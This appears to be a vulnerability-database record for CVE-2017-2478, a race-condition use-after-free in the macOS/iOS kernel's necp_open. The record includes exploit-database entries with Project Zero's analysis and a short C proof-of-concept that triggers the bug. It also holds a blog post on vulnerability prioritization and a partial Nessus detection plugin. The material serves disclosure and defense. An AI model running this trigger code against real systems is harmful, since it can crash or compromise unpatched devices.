ID CVE-2017-2478 Type cve Reporter cve@mitre.org Modified 2019-03-08T16:06:00
Description
An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. The issue involves the "Kernel" component. A race condition allows attackers to execute arbitrary code in a privileged context via a crafted app.
{"seebug": [{"lastseen": "2017-11-19T12:00:17", "bulletinFamily": "exploit", "description": "necp_open is a syscall used to obtain a new necp file descriptor\n\nThe necp file's fp's fg_data points to a struct necp_fd_data allocated on the heap.\n\nHere's the relevant code from necp_open:\n\n`` error = falloc(p, &fp, &fd, vfs_context_current()); <\\--------------------- (a) if (error != 0) { goto done; }\n\nif ((fd_data = _MALLOC(sizeof(struct necp_fd_data), M_NECP, M_WAITOK | M_ZERO)) == NULL) { error = ENOMEM; goto done; }\n\nfd_data->flags = uap->flags; LIST_INIT(&fd_data->clients); lck_mtx_init(&fd_data->fd_lock, necp_fd_mtx_grp, necp_fd_mtx_attr); klist_init(&fd_data->si. si_note); fd_data->proc_pid = proc_pid(p);\n\nfp->f_fglob->fg_flag = FREAD; fp->f_fglob->fg_ops = &necp_fd_ops; fp->f_fglob->fg_data = fd_data; <\\-------------------------- (b)\n\nproc_fdlock(p);\n\n*fdflags(p, fd) |= (UF_EXCLOSE | UF_FORKCLOSE); procfdtbl_releasefd(p, fd, NULL); fp_drop(p, fd, fp, 1); proc_fdunlock(p); <\\--------------------- (c)\n\n*retval = fd;\n\nlck_rw_lock_exclusive(&necp_fd_lock); <\\---------------- (d) LIST_INSERT_HEAD(&necp_fd_list, fd_data, chain); <\\------(e) lck_rw_done(&necp_fd_lock); ``\n\nat (a) a new file descriptor and file object is allocated for the calling process at (b) that the new file's fg_data is set to the fd_data heap allocation at (c) the process fd table is unlocked meaning that other processes can now look up the new fd and get the associated fp\n\nat (d) the necp_fd_lock is taken then at (e) the fd_data is enqueued into the necp_fd_list\n\nThe bug is that the fd_data is owned by the fp so that after we drop the proc_fd lock at (c) another thread can call close on the new fd which will free fd_data before we enqueue it at (e).\n\ntested on MacOS 10.12.3 (16D32) on MacbookAir5,2 \n\nAttachment: [necp_open. c](<https://bugs.chromium.org/p/project-zero/issues/attachment?aid=270104>)\n", "modified": "2017-04-04T00:00:00", "published": "2017-04-04T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92889", "id": "SSV:92889", "type": "seebug", "title": "MacOS/iOS kernel uaf due to bad locking in necp_open (CVE-2017-2478)", "sourceData": "", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}], "zdt": [{"lastseen": "2018-03-13T20:37:03", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2017-04-04T00:00:00", "published": "2017-04-04T00:00:00", "href": "https://0day.today/exploit/description/27495", "id": "1337DAY-ID-27495", "title": "macOS / iOS Kernel 10.12.3 (16D32) - Bad Locking in necp_open Use-After-Free Exploit", "type": "zdt", "sourceData": "/*\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1116\r\n \r\nnecp_open is a syscall used to obtain a new necp file descriptor\r\n \r\nThe necp file's fp's fg_data points to a struct necp_fd_data allocated on the heap.\r\n \r\nHere's the relevant code from necp_open:\r\n \r\n error = falloc(p, &fp, &fd, vfs_context_current()); <--------------------- (a)\r\n if (error != 0) {\r\n goto done;\r\n }\r\n \r\n if ((fd_data = _MALLOC(sizeof(struct necp_fd_data), M_NECP,\r\n M_WAITOK | M_ZERO)) == NULL) {\r\n error = ENOMEM;\r\n goto done;\r\n }\r\n \r\n fd_data->flags = uap->flags;\r\n LIST_INIT(&fd_data->clients);\r\n lck_mtx_init(&fd_data->fd_lock, necp_fd_mtx_grp, necp_fd_mtx_attr);\r\n klist_init(&fd_data->si.si_note);\r\n fd_data->proc_pid = proc_pid(p);\r\n \r\n fp->f_fglob->fg_flag = FREAD;\r\n fp->f_fglob->fg_ops = &necp_fd_ops;\r\n fp->f_fglob->fg_data = fd_data; <-------------------------- (b)\r\n \r\n proc_fdlock(p);\r\n \r\n *fdflags(p, fd) |= (UF_EXCLOSE | UF_FORKCLOSE);\r\n procfdtbl_releasefd(p, fd, NULL);\r\n fp_drop(p, fd, fp, 1);\r\n proc_fdunlock(p); <--------------------- (c)\r\n \r\n *retval = fd;\r\n \r\n lck_rw_lock_exclusive(&necp_fd_lock); <---------------- (d)\r\n LIST_INSERT_HEAD(&necp_fd_list, fd_data, chain); <------(e)\r\n lck_rw_done(&necp_fd_lock);\r\n \r\nat (a) a new file descriptor and file object is allocated for the calling process\r\nat (b) that new file's fg_data is set to the fd_data heap allocation\r\nat (c) the process fd table is unlocked meaning that other processes can now look up\r\n the new fd and get the associated fp\r\n \r\nat (d) the necp_fd_lock is taken then at (e) the fd_data is enqueued into the necp_fd_list\r\n \r\nThe bug is that the fd_data is owned by the fp so that after we drop the proc_fd lock at (c)\r\nanother thread can call close on the new fd which will free fd_data before we enqueue it at (e).\r\n \r\ntested on MacOS 10.12.3 (16D32) on MacbookAir5,2 \r\n \r\nin: \"...that other processes can now look up the new fd and get the associated fp...\" I meant threads, not processes!\r\n \r\n*/\r\n \r\n// ianbeer\r\n#if 0\r\nMacOS/iOS kernel uaf due to bad locking in necp_open\r\n \r\nnecp_open is a syscall used to obtain a new necp file descriptor\r\n \r\nThe necp file's fp's fg_data points to a struct necp_fd_data allocated on the heap.\r\n \r\nHere's the relevant code from necp_open:\r\n \r\n error = falloc(p, &fp, &fd, vfs_context_current()); <--------------------- (a)\r\n if (error != 0) {\r\n goto done;\r\n }\r\n \r\n if ((fd_data = _MALLOC(sizeof(struct necp_fd_data), M_NECP,\r\n M_WAITOK | M_ZERO)) == NULL) {\r\n error = ENOMEM;\r\n goto done;\r\n }\r\n \r\n fd_data->flags = uap->flags;\r\n LIST_INIT(&fd_data->clients);\r\n lck_mtx_init(&fd_data->fd_lock, necp_fd_mtx_grp, necp_fd_mtx_attr);\r\n klist_init(&fd_data->si.si_note);\r\n fd_data->proc_pid = proc_pid(p);\r\n \r\n fp->f_fglob->fg_flag = FREAD;\r\n fp->f_fglob->fg_ops = &necp_fd_ops;\r\n fp->f_fglob->fg_data = fd_data; <-------------------------- (b)\r\n \r\n proc_fdlock(p);\r\n \r\n *fdflags(p, fd) |= (UF_EXCLOSE | UF_FORKCLOSE);\r\n procfdtbl_releasefd(p, fd, NULL);\r\n fp_drop(p, fd, fp, 1);\r\n proc_fdunlock(p); <--------------------- (c)\r\n \r\n *retval = fd;\r\n \r\n lck_rw_lock_exclusive(&necp_fd_lock); <---------------- (d)\r\n LIST_INSERT_HEAD(&necp_fd_list, fd_data, chain); <------(e)\r\n lck_rw_done(&necp_fd_lock);\r\n \r\nat (a) a new file descriptor and file object is allocated for the calling process\r\nat (b) that new file's fg_data is set to the fd_data heap allocation\r\nat (c) the process fd table is unlocked meaning that other processes can now look up\r\n the new fd and get the associated fp\r\n \r\nat (d) the necp_fd_lock is taken then at (e) the fd_data is enqueued into the necp_fd_list\r\n \r\nThe bug is that the fd_data is owned by the fp so that after we drop the proc_fd lock at (c)\r\nanother thread can call close on the new fd which will free fd_data before we enqueue it at (e).\r\n \r\ntested on MacOS 10.12.3 (16D32) on MacbookAir5,2 \r\n#endif\r\n \r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <pthread.h>\r\n \r\n#include <sys/syscall.h>\r\n \r\nint necp_open(int flags) {\r\n return syscall(SYS_necp_open, flags);\r\n}\r\n \r\nvoid* closer(void* arg) {\r\n while(1) {\r\n close(3);\r\n }\r\n}\r\n \r\nint main() {\r\n for (int i = 0; i < 10; i++) {\r\n pthread_t t;\r\n pthread_create(&t, NULL, closer, NULL);\r\n }\r\n \r\n while (1) {\r\n int fd = necp_open(0);\r\n close(fd);\r\n }\r\n \r\n return 0;\r\n}\n\n# 0day.today [2018-03-13] #", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/27495"}], "exploitdb": [{"lastseen": "2017-04-04T19:17:20", "bulletinFamily": "exploit", "description": "macOS/iOS Kernel 10.12.3 (16D32) - Bad Locking in necp_open Use-After-Free. CVE-2017-2478. Dos exploit for Multiple platform. Tags: Denial of Service (DoS)", "modified": "2017-04-04T00:00:00", "published": "2017-04-04T00:00:00", "id": "EDB-ID:41794", "href": "https://www.exploit-db.com/exploits/41794/", "type": "exploitdb", "title": "macOS/iOS Kernel 10.12.3 (16D32) - Bad Locking in necp_open Use-After-Free", "sourceData": "/*\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1116\r\n\r\nnecp_open is a syscall used to obtain a new necp file descriptor\r\n\r\nThe necp file's fp's fg_data points to a struct necp_fd_data allocated on the heap.\r\n\r\nHere's the relevant code from necp_open:\r\n\r\n error = falloc(p, &fp, &fd, vfs_context_current()); <--------------------- (a)\r\n if (error != 0) {\r\n goto done;\r\n }\r\n\r\n if ((fd_data = _MALLOC(sizeof(struct necp_fd_data), M_NECP,\r\n M_WAITOK | M_ZERO)) == NULL) {\r\n error = ENOMEM;\r\n goto done;\r\n }\r\n\r\n fd_data->flags = uap->flags;\r\n LIST_INIT(&fd_data->clients);\r\n lck_mtx_init(&fd_data->fd_lock, necp_fd_mtx_grp, necp_fd_mtx_attr);\r\n klist_init(&fd_data->si.si_note);\r\n fd_data->proc_pid = proc_pid(p);\r\n\r\n fp->f_fglob->fg_flag = FREAD;\r\n fp->f_fglob->fg_ops = &necp_fd_ops;\r\n fp->f_fglob->fg_data = fd_data; <-------------------------- (b)\r\n\r\n proc_fdlock(p);\r\n\r\n *fdflags(p, fd) |= (UF_EXCLOSE | UF_FORKCLOSE);\r\n procfdtbl_releasefd(p, fd, NULL);\r\n fp_drop(p, fd, fp, 1);\r\n proc_fdunlock(p); <--------------------- (c)\r\n\r\n *retval = fd;\r\n\r\n lck_rw_lock_exclusive(&necp_fd_lock); <---------------- (d)\r\n LIST_INSERT_HEAD(&necp_fd_list, fd_data, chain); <------(e)\r\n lck_rw_done(&necp_fd_lock);\r\n\r\nat (a) a new file descriptor and file object is allocated for the calling process\r\nat (b) that new file's fg_data is set to the fd_data heap allocation\r\nat (c) the process fd table is unlocked meaning that other processes can now look up\r\n the new fd and get the associated fp\r\n\r\nat (d) the necp_fd_lock is taken then at (e) the fd_data is enqueued into the necp_fd_list\r\n\r\nThe bug is that the fd_data is owned by the fp so that after we drop the proc_fd lock at (c)\r\nanother thread can call close on the new fd which will free fd_data before we enqueue it at (e).\r\n\r\ntested on MacOS 10.12.3 (16D32) on MacbookAir5,2 \r\n\r\nin: \"...that other processes can now look up the new fd and get the associated fp...\" I meant threads, not processes!\r\n\r\n*/\r\n\r\n// ianbeer\r\n#if 0\r\nMacOS/iOS kernel uaf due to bad locking in necp_open\r\n\r\nnecp_open is a syscall used to obtain a new necp file descriptor\r\n\r\nThe necp file's fp's fg_data points to a struct necp_fd_data allocated on the heap.\r\n\r\nHere's the relevant code from necp_open:\r\n\r\n\terror = falloc(p, &fp, &fd, vfs_context_current()); <--------------------- (a)\r\n\tif (error != 0) {\r\n\t\tgoto done;\r\n\t}\r\n\r\n\tif ((fd_data = _MALLOC(sizeof(struct necp_fd_data), M_NECP,\r\n\t\t\t\t\t\t M_WAITOK | M_ZERO)) == NULL) {\r\n\t\terror = ENOMEM;\r\n\t\tgoto done;\r\n\t}\r\n\r\n\tfd_data->flags = uap->flags;\r\n\tLIST_INIT(&fd_data->clients);\r\n\tlck_mtx_init(&fd_data->fd_lock, necp_fd_mtx_grp, necp_fd_mtx_attr);\r\n\tklist_init(&fd_data->si.si_note);\r\n\tfd_data->proc_pid = proc_pid(p);\r\n\r\n\tfp->f_fglob->fg_flag = FREAD;\r\n\tfp->f_fglob->fg_ops = &necp_fd_ops;\r\n\tfp->f_fglob->fg_data = fd_data; <-------------------------- (b)\r\n\r\n\tproc_fdlock(p);\r\n\r\n\t*fdflags(p, fd) |= (UF_EXCLOSE | UF_FORKCLOSE);\r\n\tprocfdtbl_releasefd(p, fd, NULL);\r\n\tfp_drop(p, fd, fp, 1);\r\n\tproc_fdunlock(p); <--------------------- (c)\r\n\r\n\t*retval = fd;\r\n\r\n\tlck_rw_lock_exclusive(&necp_fd_lock); <---------------- (d)\r\n\tLIST_INSERT_HEAD(&necp_fd_list, fd_data, chain); <------(e)\r\n\tlck_rw_done(&necp_fd_lock);\r\n\r\nat (a) a new file descriptor and file object is allocated for the calling process\r\nat (b) that new file's fg_data is set to the fd_data heap allocation\r\nat (c) the process fd table is unlocked meaning that other processes can now look up\r\n the new fd and get the associated fp\r\n\r\nat (d) the necp_fd_lock is taken then at (e) the fd_data is enqueued into the necp_fd_list\r\n\r\nThe bug is that the fd_data is owned by the fp so that after we drop the proc_fd lock at (c)\r\nanother thread can call close on the new fd which will free fd_data before we enqueue it at (e).\r\n\r\ntested on MacOS 10.12.3 (16D32) on MacbookAir5,2 \r\n#endif\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <pthread.h>\r\n\r\n#include <sys/syscall.h>\r\n\r\nint necp_open(int flags) {\r\n return syscall(SYS_necp_open, flags);\r\n}\r\n\r\nvoid* closer(void* arg) {\r\n while(1) {\r\n close(3);\r\n }\r\n}\r\n\r\nint main() {\r\n for (int i = 0; i < 10; i++) {\r\n pthread_t t;\r\n pthread_create(&t, NULL, closer, NULL);\r\n }\r\n \r\n while (1) {\r\n int fd = necp_open(0);\r\n close(fd);\r\n }\r\n\r\n return 0;\r\n}\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/41794/"}], "avleonov": [{"lastseen": "2017-06-19T23:16:03", "bulletinFamily": "blog", "description": "Hi everyone! Today I would like talk about software vulnerabilities. How to find really interesting vulnerabilities in the overall CVE flow. And how to do it automatically.\n\n\n\nFirst of all, let's talk why we may ever need to analyze software vulnerabilities? How people usually do their Vulnerability Management and Vulnerability Intelligence?\n\n\n\n * Some people have a Vulnerability scanner, scan infrastructure with it, patch founded vulnerabilities and think that this will be enough.\n * Some people pay attention to the vulnerabilities that are widely covered by media.\n * Some people use vulnerability databases and search for the most critical vulnerabilities by some criteria.\n\nEach of these ways have some advantages and some disadvantages.\n\n### Vulnerability Scanners\n\nHuge part of detection plugins were written manually. Especially plugins that work remotely without authorization. It takes time to make them and so they may appear in scanner with a huge latency. It also might be economically impractical for VM vendors to deal with vulnerabilities in some rare software.\n\n### Vulnerabilities, that are widely covered in media\n\nFrom the one hand it's really great. Even Top managers might ask you if we have, for example, GHOST in our infrastructure or other popular vulnerability. They begin to see that you are doing something important!\n\n\n\nOn the other hand, vulnerability researchers are also people. And they are interested in making more hype around the vulnerabilities they have discovered. It's just a part of their self-promotion. It's relatively easy to come with a name, register a domain and make a beautiful logo for the vulnerability. And it's hard to understand how critical this vulnerability really is. Especially when there are no so much details.\n\nHere you can see some well-known vulnerabilities that made a lot of noise in the past.\n\n\n\nMost of them were really critical. But, I have seen plenty of publications about BadLock saying that this vulnerability was overvalued.\n\n### Vulnerability databases and feeds\n\nMost people use CVSS vector and the CVSS Base Score for vulnerability filtering and vulnerability prioritization. They may also take into consideration the existence of exploits, for example. But the CVSS is still a basis.\n\nWhat is the Common Vulnerability Scoring System? In fact, there is a framework, a questionnaire, in which some person manually describes the vulnerability.\n\n\n\nI do not know who fills CVSS for National Vulnerability Database. But, imagine some people in US military uniform.\n\n\n\nThe final result is a score, number from 0 to 10, and a vector containing all the answers in a compact form.\n\nWhat's wrong with CVSS?\n\n * Filling the questionnaire is highly subjective procedure. You can easily make a mistake or just think differently during the classification.Or you may just have a controversial information about the vulnerability.\n * It takes time. That's why CVSS for the vulnerability appears in database much later than a human-readable description.\n * In NVD, for example, you can see only Base Score and Base Vector. And there is no Temporal Vector available.\n * CVSS model works well when we talk about desktops and servers and doesn't really fit for Internet of Things, for example.\n * CVSS is not well suited for confidentiality threats. A good example is the well-known Heartbleed.\n\nHeartbleed was rated as a medium-level vulnerability by NVD. But on the other hand, Tenable Network Security, the well-known Vulnerability Management vendor, believes that this vulnerability should have different CVSS vector.\n\n\n\nSo this is a controversial issue:\n\n * Confidentiality Impact is Complete or Partial?\n * Integrity Impact is None or Complete?\n\nAnd the final result depends on this.\n\nIt was the 2nd version of the CVSS standard, now the actual version is 3rd. But in 3rd versions problems with confidentiality threats were not solved either.\n\n### Vulnerability Quadrants\n\nSo, my idea was to evaluate vulnerabilities using the data that we currently have. Of course, it would be great to work with some highly formalized descriptions of vulnerabilities. However, as a rule, we do not have such information. We have only different objects linked with each other and stored in some vulnerability database.\n\nIf we open, for example, [Heartbleed page](<https://vulners.com/cve/CVE-2014-0160>) at [vulners.com](<https://vulners.com>) (read more about this service at \"[Vulners \u2013 Google for hacker](<https://avleonov.com/2016/07/23/vulners-google-for-hacker-how-the-best-vulnerability-search-engine-works-and-how-to-use-it/>)\") we can see all the objects linked to this vulnerability and the timestamps when objects were created.\n\n\n\nUsing this data I can calculate two integrated characteristics of vulnerability: \"Danger\" and \"Relevance\". And I can do it for any moment of time.\n\n**\"Danger\"** is about technical criticality and exploitability. It shows how interesting this vulnerability may be for an attacker.\n\nIt depends on:\n\n * CVSS Base Score \u2191\n * Potential exploitability \u2191\n * Exploits \u2191\n * Malware* \u2191\n * Patches \u2193\n * Detection plugins \u2193\n * Age \u2193\n\n**\"Relevance\"** shows the attention paid to the vulnerability by media, vulnerability management vendors, and users of vulnerability databases.\n\nIt depends on:\n\n * Media coverage \u2191\n * Descriptions \u2191\n * Detection plugins \u2191\n * Search queries* \u2191\n * Search results* \u2191 \n\n * Clicks* \u2191 \n\n * Age \u2193\n\n* haven't used it in PoC\n\nTo show the current state of vulnerability I use \"quadrants\". Like consulting and research companies do it for comparing software vendors.\n\n\n\n\n\nSo, for products \"Ability to execute\" and \"Completeness of vision\" are important, for vulnerabilities it will be \"Danger\" and \"Relevance\".\n\nI gave this names to quadrants:\n\n * Leading Threats\n * Local Disaster\n * Well-known Issue\n * Daily Routine\n\nHere is, for example, Vulnerability Quadrant for [Heartbleed](<https://vulners.com/cve/CVE-2014-0160>):\n\nAnd this one is for [Badlock](<https://vulners.com/cve/CVE-2016-2118>):\n\nAs you can see, unlike Heartbleed, Badlock was never a Leading Threat.\n\nWe can visualize more than one vulnerability at the same time. For example, here I took [last year CVEs](<https://vulners.com/search?query=type:cve%20last%20year>) and showed dynamics of their state since this beginning of the year (from 2017-01-01 till 2017-04-15).\n\nTo limit amount of the vulnerabilities in the lower left corner I made a \"rule for disappearing\": vulnerability may stay in Daily Routine quadrant only for 10 days with value of Danger and Relevance <3.5 or they will disappear.\n\nHere you can see different types of vulnerabilities. These ones are about [race condition that allows attackers to execute arbitrary code in a privileged context via a crafted app](<https://vulners.com/cve/CVE-2017-2478>). (iOS, macOS, tvOS, watchOS):\n\n\n\nAnd these vulnerabilities in Microsoft Edge and WordPress are also dangerous and exploitable, but never get the same level of media attention. Researchers find vulnerabilities in this products on a regular basis and therefore it's not a news. Vulnerabilities of such kind are slowly drifting from Local Disaster quadrant to Daily Routine.\n\n\n\nOf course, \"rule for disappearing\" doesn't work in real life and all vulnerabilities will exist in your infrastructure until you install the updates. If I switch off this rule and switch off all the captions, we will see something like this:\n\nSo, don't forget to fix vulnerabilities in your systems until it's too late:\n\n\n\nThe Greedy Raja covered with golden coins. From the classic Soviet animated film [Golden Antelope](<https://www.youtube.com/watch?v=wpSAJOyLfU8>)\n\nVulnerability Quadrant is a simple and universal way to show the current state for any vulnerability and dynamics of this state. it's possible to highlight most critical vulnerabilities and to identify trends. And it's just fun to watch vulnerabilities crawling on the screen. \n\nProblems and limitations \n- It\u2019s all about CVEs. And we all know, that some vulnerabilities may have multiple CVEs and some may don't have CVEs at all, for example vulnerabilities in SAP products. And they are out of scope right now. \n- Formulas for Danger and Relevance are very subjective. Basically, what factors you choose, such values you will get. However, when you use the same formulas for all vulnerabilities the overall picture remains the same. \n- We can make this instrument much more effective, but we need more information about exploits, malware, statistics and search history from vulnerability databases and so on.\n\n**Q:** Can we use Vulnerability Quadrants to decide which of vulnerabilities are really dangerous for your organization and should be discovered and patched immediately?\n\nWell, yes, but not in the form we have seen earlier. First of all, we should switch off gravity. Vulnerability Danger will not become smaller until you patch the software in your organization. As well as Relevance. And you should consider only vulnerabilities in the software products that are currently in use in your organization.\n\n", "modified": "2017-05-09T21:17:36", "published": "2017-05-09T21:17:36", "id": "AVLEONOV:B5CA8049524C96A911991EE8ADF24F64", "href": "http://feedproxy.google.com/~r/avleonov/~3/nMNWzQgosww/", "title": "Vulnerability Quadrants", "type": "avleonov", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2020-01-01T06:41:07", "bulletinFamily": "scanner", "description": "According to its banner, the version of Apple TV on the remote device\nis prior to 10.2. It is, therefore, affected by multiple\nvulnerabilities :\n\n - An out-of-bounds read error exists in LibTIFF in the\n DumpModeEncode() function within file tif_dumpmode.c.\n An unauthenticated, remote attacker can exploit this\n to crash a process linked against the library or\n disclose memory contents. (CVE-2016-3619)\n\n - An out-of-bounds read error exists in WebKit when\n handling certain JavaScript code. An unauthenticated,\n remote attacker can exploit this to cause a denial of\n service condition or the disclosure of memory contents.\n (CVE-2016-9642)\n\n - A denial of service vulnerability exists in WebKit when\n handling certain regular expressions. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted web page, to exhaust available memory\n resources. (CVE-2016-9643)\n\n - An information disclosure vulnerability exists in WebKit\n when handling page loading due to improper validation of\n certain input. An unauthenticated, remote attacker can\n exploit this to disclose data cross-origin.\n (CVE-2017-2367)\n\n - A buffer overflow condition exists in the Carbon\n component when handling specially crafted DFONT files\n due to improper validation of certain input. An\n unauthenticated, remote attacker can exploit this, via\n a specially crafted file, to cause a denial of service\n condition or the execution of arbitrary code.\n (CVE-2017-2379)\n\n - An information disclosure vulnerability exists in WebKit\n when handling unspecified exceptions. An\n unauthenticated, remote attacker can exploit this, via\n specially crafted web content, to disclose data\n cross-origin. (CVE-2017-2386)\n\n - A flaw exists in the libarchive component due to the\n insecure creation of temporary files. A local attacker\n can exploit this, by using a symlink attack against an\n unspecified file, to cause unexpected changes to be made\n to file system permissions. (CVE-2017-2390)\n\n - Multiple memory corruption issues exist in WebKit that\n allow an unauthenticated, remote attacker to cause a\n denial of service condition or the execution of\n arbitrary code. (CVE-2017-2394, CVE-2017-2395,\n CVE-2017-2396, CVE-2017-2454, CVE-2017-2455,\n CVE-2017-2459, CVE-2017-2460, CVE-2017-2464,\n CVE-2017-2465, CVE-2017-2466, CVE-2017-2468,\n CVE-2017-2469, CVE-2017-2470, CVE-2017-2476)\n\n - A memory corruption issue exists in the Kernel component\n due to improper validation of certain input. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to run a specially crafted\n application, to cause a denial of service condition or\n the execution or arbitrary code. (CVE-2017-2401)\n\n - Multiple memory corruption issues exist in the FontParser\n component when handling font files due to improper\n validation of certain input. An unauthenticated, remote\n attacker can exploit these to cause a denial condition\n or the execution of arbitrary code. (CVE-2017-2406,\n CVE-2017-2407, CVE-2017-2487)\n\n - An unspecified type confusion error exists in WebKit\n that allows an unauthenticated, remote attacker to\n execute arbitrary code by using specially crafted web\n content. (CVE-2017-2415)\n\n - A memory corruption issue exists in the ImageIO\n component, specifically in the GIFReadPlugin::init()\n function, when handling image files due to improper\n validation of certain input. An unauthenticated, remote\n attacker can exploit this, via a specially crafted image\n file, to cause a denial of service condition or the\n execution of arbitrary code. (CVE-2017-2416)\n\n - An infinite recursion condition exists in the\n CoreGraphics component when handling image files. An\n unauthenticated, remote can exploit this, via a\n specially crafted image file, to cause a denial of\n service condition. (CVE-2017-2417)\n\n - An unspecified flaw exists related to nghttp2 and\n LibreSSL. An unauthenticated, remote attacker can\n exploit this, by convincing a user to access a malicious\n HTTP/2 server, to have an unspecified impact on\n confidentiality, integrity, and availability.\n (CVE-2017-2428)\n\n - A type confusion error exists in the Audio component\n when parsing specially crafted M4A audio files due to\n improper validation of certain input. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted file, to cause a denial of service\n condition or the execution of arbitrary code.\n (CVE-2017-2430)\n\n - An integer overflow condition exists in the ImageIO\n component when handling JPEG files due to improper\n validation of certain input. An unauthenticated, remote\n attacker can exploit this, via a specially crafted file,\n to cause a denial of service condition or the execution\n of arbitrary code. (CVE-2017-2432)\n\n - A memory corruption issue exists in the CoreText\n component when handling font files due to improper\n validation of certain input. An unauthenticated, remote\n attacker can exploit this, via a specially crafted file,\n to cause a denial of service condition or the execution\n of arbitrary code. (CVE-2017-2435)\n\n - An out-of-bounds read error exists in the FontParser\n component when handling font files. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted file, to disclose process memory.\n (CVE-2017-2439)\n\n - An integer overflow condition exists in the Kernel\n component due to improper validation of certain input.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to run a specially crafted\n application, to execute arbitrary code with kernel-level\n privileges. (CVE-2017-2440)\n\n - A use-after-free error exists in libc++abi when\n demangling C++ applications. An unauthenticated, remote\n attacker can exploit this, by convincing a user to run a\n specially crafted application, to execute arbitrary\n code. (CVE-2017-2441)\n\n - A memory corruption issue exists in WebKit within the\n CoreGraphics component due to improper validation of\n certain input. An unauthenticated, remote attacker can\n exploit this, via specially crafted web content, to\n cause a denial of service condition or the execution of\n arbitrary code. (CVE-2017-2444)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in WebKit when handling frame objects due to\n improper validation of certain input. An\n unauthenticated, remote attacker can exploit this, via\n specially crafted web content, to execute arbitrary\n script code in a user", "modified": "2020-01-02T00:00:00", "id": "APPLETV_10_2.NASL", "href": "https://www.tenable.com/plugins/nessus/99264", "published": "2017-04-10T00:00:00", "title": "Apple TV < 10.2 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99264);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2016-3619\",\n \"CVE-2016-9642\",\n \"CVE-2016-9643\",\n \"CVE-2017-2367\",\n \"CVE-2017-2379\",\n \"CVE-2017-2386\",\n \"CVE-2017-2390\",\n \"CVE-2017-2394\",\n \"CVE-2017-2395\",\n \"CVE-2017-2396\",\n \"CVE-2017-2401\",\n \"CVE-2017-2406\",\n \"CVE-2017-2407\",\n \"CVE-2017-2415\",\n \"CVE-2017-2416\",\n \"CVE-2017-2417\",\n \"CVE-2017-2428\",\n \"CVE-2017-2430\",\n \"CVE-2017-2432\",\n \"CVE-2017-2435\",\n \"CVE-2017-2439\",\n \"CVE-2017-2440\",\n \"CVE-2017-2441\",\n \"CVE-2017-2444\",\n \"CVE-2017-2445\",\n \"CVE-2017-2446\",\n \"CVE-2017-2447\",\n \"CVE-2017-2448\",\n \"CVE-2017-2450\",\n \"CVE-2017-2451\",\n \"CVE-2017-2454\",\n \"CVE-2017-2455\",\n \"CVE-2017-2456\",\n \"CVE-2017-2458\",\n \"CVE-2017-2459\",\n \"CVE-2017-2460\",\n \"CVE-2017-2461\",\n \"CVE-2017-2462\",\n \"CVE-2017-2464\",\n \"CVE-2017-2465\",\n \"CVE-2017-2466\",\n \"CVE-2017-2467\",\n \"CVE-2017-2468\",\n \"CVE-2017-2469\",\n \"CVE-2017-2470\",\n \"CVE-2017-2472\",\n \"CVE-2017-2473\",\n \"CVE-2017-2474\",\n \"CVE-2017-2475\",\n \"CVE-2017-2476\",\n \"CVE-2017-2478\",\n \"CVE-2017-2481\",\n \"CVE-2017-2482\",\n \"CVE-2017-2483\",\n \"CVE-2017-2485\",\n \"CVE-2017-2487\",\n \"CVE-2017-2490\",\n \"CVE-2017-2491\",\n \"CVE-2017-2492\"\n );\n script_bugtraq_id(\n 85919,\n 94554,\n 94559,\n 97130,\n 97131,\n 97132,\n 97134,\n 97137,\n 97143,\n 97146,\n 97301,\n 98316\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-03-27-6\");\n\n script_name(english:\"Apple TV < 10.2 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the build number.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apple TV device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Apple TV on the remote device\nis prior to 10.2. It is, therefore, affected by multiple\nvulnerabilities :\n\n - An out-of-bounds read error exists in LibTIFF in the\n DumpModeEncode() function within file tif_dumpmode.c.\n An unauthenticated, remote attacker can exploit this\n to crash a process linked against the library or\n disclose memory contents. (CVE-2016-3619)\n\n - An out-of-bounds read error exists in WebKit when\n handling certain JavaScript code. An unauthenticated,\n remote attacker can exploit this to cause a denial of\n service condition or the disclosure of memory contents.\n (CVE-2016-9642)\n\n - A denial of service vulnerability exists in WebKit when\n handling certain regular expressions. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted web page, to exhaust available memory\n resources. (CVE-2016-9643)\n\n - An information disclosure vulnerability exists in WebKit\n when handling page loading due to improper validation of\n certain input. An unauthenticated, remote attacker can\n exploit this to disclose data cross-origin.\n (CVE-2017-2367)\n\n - A buffer overflow condition exists in the Carbon\n component when handling specially crafted DFONT files\n due to improper validation of certain input. An\n unauthenticated, remote attacker can exploit this, via\n a specially crafted file, to cause a denial of service\n condition or the execution of arbitrary code.\n 